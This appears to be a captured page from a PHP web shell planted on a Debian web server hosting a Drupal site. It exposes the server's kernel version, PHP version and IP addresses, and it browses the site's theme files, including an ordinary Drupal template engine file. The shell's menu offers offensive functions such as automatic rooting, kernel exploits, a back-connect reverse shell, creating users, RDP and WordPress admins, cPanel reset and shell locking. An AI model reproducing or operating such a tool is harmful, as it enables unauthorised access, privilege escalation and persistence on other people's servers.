Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.221.217.100
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
themes /
engines /
phptemplate /
[ HOME SHELL ]
Name
Size
Permission
Action
phptemplate.engine
572
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phptemplate.engine
<?php /** * @file * Handles integration of PHP templates with the Drupal theme system. */ /** * Implements hook_init(). */ function phptemplate_init($template) { $file = dirname($template->filename) . '/template.php'; if (file_exists($file)) { include_once DRUPAL_ROOT . '/' . $file; } } /** * Implements hook_theme(). */ function phptemplate_theme($existing, $type, $theme, $path) { $templates = drupal_find_theme_functions($existing, array($theme)); $templates += drupal_find_theme_templates($existing, '.tpl.php', $path); return $templates; }
Close